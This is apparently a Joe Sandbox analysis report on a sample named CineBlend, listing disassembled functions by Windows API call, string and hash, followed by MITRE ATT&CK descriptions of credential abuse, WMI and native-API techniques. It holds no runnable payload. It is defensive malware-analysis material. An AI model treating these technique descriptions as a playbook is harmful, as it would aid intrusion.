Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: befcff9f68c9ed4cdf34d1255ccca1e292b0ade8fad77675f84360bdde2a6c21
Instruction ID: 9af2a1de2afb58070c1517ff528c9d397b8d00c43e6f27752be9f136b4561e28
Opcode Fuzzy Hash: befcff9f68c9ed4cdf34d1255ccca1e292b0ade8fad77675f84360bdde2a6c21
Instruction Fuzzy Hash: 08316D71801219ABCF05DFA4CC85EEEBFF9FF05314F5000A9F919A6166EB719A06CB60

Function 00BC4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00BC40BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BC40F8

Strings

static, xrefs: 00BC4058

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e7d25e70f585f628af52415a0513dc0895ef74d153d37125679edf3cd087198f
Instruction ID: 02e0fa7f42204e309eac4f3b838ed510a5e7b4043c84272298c519b2a966bfb4
Opcode Fuzzy Hash: e7d25e70f585f628af52415a0513dc0895ef74d153d37125679edf3cd087198f
Instruction Fuzzy Hash: 2C31AD71140604AADB208F28CC90FBB77E8FF48720F00866DF9A587190CB31AD81CB60

Function 00BC4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00BC50BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BC50D2

Strings

', xrefs: 00BC502C

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f2ece742d1499591e3dc48e07515fefc358a82bb821b1f643f94b83ff6850c6e
Instruction ID: 78cd5d64c3608ae0836562697169a276cc6e3c15a59e3cb94e4e5fb674165c4d
Opcode Fuzzy Hash: f2ece742d1499591e3dc48e07515fefc358a82bb821b1f643f94b83ff6850c6e
Instruction Fuzzy Hash: CD31D474A0160A9FDB24CFA9C981FDABBF5FB49300F1040AAE904EB351D771A985CF90

Function 00BC3C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BC3D18
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BC3D23

Strings

Combobox, xrefs: 00BC3CE5

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 8f0fc905bc20870c25c0fb18ace5bf70651b350ff5c4202d8a6b7e45906209a0
Instruction ID: 0359874a8a4e65f5711164f57e3229af51b356679dc135b10b18c434bf0879cc
Opcode Fuzzy Hash: 8f0fc905bc20870c25c0fb18ace5bf70651b350ff5c4202d8a6b7e45906209a0
Instruction Fuzzy Hash: C111B2717002086FEF118F54DC80FBF3BEAEB887A4F508169F91597290D6719D518BA0

Function 00BC41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B37873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B378B1
Part of subcall function 00B37873: GetStockObject.GDI32(00000011), ref: 00B378C5
Part of subcall function 00B37873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B378CF

GetWindowRect.USER32(00000000,?), ref: 00BC4216
GetSysColor.USER32(00000012), ref: 00BC4230

Strings

static, xrefs: 00BC41F3

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: da40702ff7c41ef17bc3b0799b31a26951f95aa0a0e440ccd70f8a292c883937
Instruction ID: 6f7d4016921722c86a100d7cff004d37a330cc082e8f9527dbf3d532bf7d6cdb
Opcode Fuzzy Hash: da40702ff7c41ef17bc3b0799b31a26951f95aa0a0e440ccd70f8a292c883937
Instruction Fuzzy Hash: 76112676620209AFDB00DFA8CC46FEA7BE8EB08314F014968F955E7250DB35E850DB60

Function 00BAD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BAD7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BAD7EB

Strings

<local>, xrefs: 00BAD7AB

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: e59c270e1eb90949771548e27cddad7551f7718e340c5476516deb9cd4e5a8dc
Instruction ID: 1bd3d8ea3c7c80c57af0a3cc8024984faed0b9b20eb9ac71ac72c4b9c4160139
Opcode Fuzzy Hash: e59c270e1eb90949771548e27cddad7551f7718e340c5476516deb9cd4e5a8dc
Instruction Fuzzy Hash: 48110271209232BAD73C4B668C89FF7BEDCEB137A4F00426AB50A83480D6708C44C6F0

Function 00B975ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

CharUpperBuffW.USER32(?,?,?), ref: 00B9761D
_wcslen.LIBCMT ref: 00B97629

Strings

STOP, xrefs: 00B97623, 00B97628

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 971d3d148b3c2d585fd439db7b82604ff18d68c179790ebc87550052570cdab7
Instruction ID: 405ec62a0381df60f5ce8747124309323e0ee07f5857ba0a88cf5e4a6304c0f6
Opcode Fuzzy Hash: 971d3d148b3c2d585fd439db7b82604ff18d68c179790ebc87550052570cdab7
Instruction Fuzzy Hash: E001C032A64A2A8BCF20AEBDCC809BF77F5EB61750B5005B4E821972A5EF31D904C650

Function 00B9262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00B945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B94620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B92699

Strings

ListBox, xrefs: 00B92663
ComboBox, xrefs: 00B92638

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 85316b0b2fb476f58e1120814927e8f997e818b3183a6ccaa34928ef746a9a32
Instruction ID: 1abb4270763318fe5f37f2a974fb74c7cfb9160b394816d197ab6d2d0a5c8870
Opcode Fuzzy Hash: 85316b0b2fb476f58e1120814927e8f997e818b3183a6ccaa34928ef746a9a32
Instruction Fuzzy Hash: 2401B175A00228BBCF04ABA4CC51DFE77E8EF56350F1006AAA932972D5DB31580D8650

Function 00B92525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00B945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B94620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00B92593

Strings

ListBox, xrefs: 00B9255D
ComboBox, xrefs: 00B92532

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 29dea1e9722ce80269e0fdf3a1bdddab674ce6817e6a182866203ef8900f6176
Instruction ID: 6019532cf6fd2e7f5e9e313ef29db953bf28e50868691eaebabe949a9d8aa186
Opcode Fuzzy Hash: 29dea1e9722ce80269e0fdf3a1bdddab674ce6817e6a182866203ef8900f6176
Instruction Fuzzy Hash: D101A775A401087BDF04EB90C962EFE77E8DF65340F6100BA7902A7281DB209E0CC6B1

Function 00B925A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00B945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B94620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00B92615

Strings

ListBox, xrefs: 00B925E1
ComboBox, xrefs: 00B925B6

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 1eb8173f57a8fe80f533688936c5b9e5429215a7e2fd28c72e76e24a09766972
Instruction ID: 1736e87225e503a457f72e871b33393db4d0b4188599a3b4c2743b88f542b191
Opcode Fuzzy Hash: 1eb8173f57a8fe80f533688936c5b9e5429215a7e2fd28c72e76e24a09766972
Instruction Fuzzy Hash: B301AD75E401087BCF05EBA4C942EFE77E8DB15340F6000BAB902E3282DB619E0996B1

Function 00B926B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00B945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B94620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00B92720

Strings

ListBox, xrefs: 00B926ED
ComboBox, xrefs: 00B926C2

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 52a6cdbb22c0c05812e2ffc4b27bbcff0a093adf7c145773a1fabd10c6fdd45f
Instruction ID: 7ea52f91d52ecb5cf7643adc3f1a11245c50d5eb956d61609018d16c2d51f142
Opcode Fuzzy Hash: 52a6cdbb22c0c05812e2ffc4b27bbcff0a093adf7c145773a1fabd10c6fdd45f
Instruction Fuzzy Hash: 9DF08175E4021876CB04A7A48C92FFE77E8EF05750F5009B5B922A72C2DB655C0C8660

Function 00B91461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B9146F

Strings

AutoIt, xrefs: 00B91463
Error allocating memory., xrefs: 00B91468

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: d6b343d064c062118ecdf3b7bc8f50ddc0008736a2dbc27b3a20c4552d0519ad
Instruction ID: 79f96a2dd470c49c4700f689f509b003f58daae5ae3b34fe93db987200e009a9
Opcode Fuzzy Hash: d6b343d064c062118ecdf3b7bc8f50ddc0008736a2dbc27b3a20c4552d0519ad
Instruction Fuzzy Hash: E0E0D832248B1936D2203794AC03F8576C4CF08B52F1148FEFF88655C24EF22450429A

Function 00B510B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B4FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B510E2,?,?,?,00B3100A), ref: 00B4FAD9

IsDebuggerPresent.KERNEL32(?,?,?,00B3100A), ref: 00B510E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B3100A), ref: 00B510F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B510F0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 3258bd425dc8a0ecfef06fcc4def44e29bc5054e10f1a894192c7303a71e2c60
Instruction ID: 059ee51dbba2735080ce8561b8ef93d1347067eea4418b73025dc7ab5056268f
Opcode Fuzzy Hash: 3258bd425dc8a0ecfef06fcc4def44e29bc5054e10f1a894192c7303a71e2c60
Instruction Fuzzy Hash: 86E06D706007518BD320AF28E905746BBE8EF04301F048DEDE885C7291EBB4E448CB91

Function 00BA39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00BA39F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00BA3A05

Strings

aut, xrefs: 00BA39F9

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 04042f48cd7fe6ef5520ec26c896534339aa6559065c44e335f5be64066f3c40
Instruction ID: b9db8d1a3ae6b885188590c659c6949e948e1dbcf84593216a9a949c0bb2297f
Opcode Fuzzy Hash: 04042f48cd7fe6ef5520ec26c896534339aa6559065c44e335f5be64066f3c40
Instruction Fuzzy Hash: 90D05E76540328A7DA20A764DC0EFDBBA6CDB48710F0002E1BA55970A1DEB0DA89CB90

Function 00BC2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BC2DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BC2DDB

Part of subcall function 00B9F292: Sleep.KERNEL32 ref: 00B9F30A

Strings

Shell_TrayWnd, xrefs: 00BC2DC1

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 872803fed89b43e4ed717dced1667b21db77b61fd19660e1f91bf8f4994d8989
Instruction ID: b009930e2320309b8ff7e58cca68a33e86900bf79b95c3239fc24c9426d088c9
Opcode Fuzzy Hash: 872803fed89b43e4ed717dced1667b21db77b61fd19660e1f91bf8f4994d8989
Instruction Fuzzy Hash: ECD0A939394304A7E668B330AC0BFE27A90AB14B10F1008B8B309AB0D0CCA06800C640

Function 00BC2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BC2E08
PostMessageW.USER32(00000000), ref: 00BC2E0F

Part of subcall function 00B9F292: Sleep.KERNEL32 ref: 00B9F30A

Strings

Shell_TrayWnd, xrefs: 00BC2E01

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5151b1ff6aa28bfff1d1f5a5ece3318f16235911c949a4f6e84112120e4a5049
Instruction ID: d731bf5938cc698df474922d6b3ce0ab66d5a5e570e724f15190a43eed23fffc
Opcode Fuzzy Hash: 5151b1ff6aa28bfff1d1f5a5ece3318f16235911c949a4f6e84112120e4a5049
Instruction Fuzzy Hash: CED0A9393C13046BE668B330AC0BFE27A90AB18B10F1008B8B305EB0D0CCA06800C644

Function 00B6C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00B6C213
GetLastError.KERNEL32 ref: 00B6C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B6C27C

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 751bea58ed0376abdcdc9adf0a7c71a6a346c3e003443a2c58b53ca71c451bbd
Instruction ID: e9ec2debf7b8603c07f73ea28196f7bd9cda390184f47aabb80c0346573c785e
Opcode Fuzzy Hash: 751bea58ed0376abdcdc9adf0a7c71a6a346c3e003443a2c58b53ca71c451bbd
Instruction Fuzzy Hash: F441F330600206AFDB219FE5C894BBABFE5EF15710F2441E9FC99AB1A1DB349D05CB60

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
